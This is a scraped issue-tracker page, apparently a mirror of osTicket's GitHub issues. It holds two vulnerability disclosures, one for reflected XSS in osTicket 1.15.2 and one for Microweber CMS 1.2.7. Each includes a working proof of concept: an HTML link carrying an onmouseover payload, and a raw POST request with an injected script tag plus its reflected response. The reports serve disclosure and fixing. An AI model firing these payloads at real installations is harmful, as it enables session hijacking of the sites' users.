osticket's People
osticket's Issues
Reflected XSS on OSTicket => 1.15.2
osTicket Reflected XSS
Vuln Description:
Reflected XSS attacks, also known as non-persistent attacks, occur when a malicious script is reflected of a web application to the victim's browser. The script is activated through a link, which sends a request to a website with a vulnerability that enables execution of malicious scripts.
Impact: High
The impact of an exploited XSS vulnerability on a web application varies a lot. It ranges from user's Session Hijacking, and if used in conjunction with a social engineering attack it can also lead to disclosure of sensitive data.
POC:
Identified un-Authenticated XSS on OS Ticket Version =< 1.15.2.
1.HTML file was created in order to replicate this issue. Since this required referrer header to be there in the request so we can host this html file any where in our controlled server. Once clicking on link present in HTML page would redirect our victim to target server as highlighted.
- XSS payload inserted in has been executed as shown in the snapshot.
_**HTML Code :**_
_<!DOCTYPE html>
<html>
<body>
<h2>Reflected XSS</h2>
<p>Host This so that it can create a referer header on click.</p>
<a href="http://127.0.0.1/osTicket-v1.15.2/upload/ajax.php/form/help-topic/2?c65b94947ba69bb4=&message=1%20onmouseover=confirm(document.location)%20">Click Here to XSS</a>
</body>
</html>_
Microweber CMS(1.2.7) Reflected XSS
Microweber Reflected XSS
Vuln Description:
Reflected XSS attacks, also known as non-persistent attacks, occur when a malicious script is reflected of a web application to the victim's browser. The script is activated through a link, which sends a request to a website with a vulnerability that enables execution of malicious scripts.
Impact: High
The impact of an exploited XSS vulnerability on a web application varies a lot. It ranges from user's Session Hijacking, and if used in conjunction with a social engineering attack it can also lead to disclosure of sensitive data.
POC:
Identified un-Authenticated XSS on microweber CMS Version =< 1.2.7.
1.Post request is modified to insert XSS payload
- XSS payload inserted in has been executed as shown in the snapshot.
Request:
`POST /latest/module/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: http://192.168.0.10/latest
Cookie: laravel_session=sZd2dncQHiqTHHF4nViZLVDVDEjgSQOk0XiKvxi9
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 97
Host: 192.168.0.10
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Connection: Keep-alive
_confirm=1&captcha_parent_for_id=footer_newsletter&module='"()&%<ScRiPt>alert(9803)</ScRiPt>`
Response:
`HTTP/1.1 200 OK
Date: Sun, 23 May 2021 18:43:25 GMT
Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
X-Powered-By: PHP/7.3.27
Cache-Control: no-cache, private
Set-Cookie: laravel_session=sZd2dncQHiqTHHF4nViZLVDVDEjgSQOk0XiKvxi9; expires=Sun, 23-May-2021 20:43:26 GMT; Max-Age=7200; path=/; httponly
Content-Length: 128
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
mw_replace_back_this_module_1163675171-parser_modules227517859110<ScRiPt>alert(9803)</ScRiPt>`
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. ๐๐๐
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google โค๏ธ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.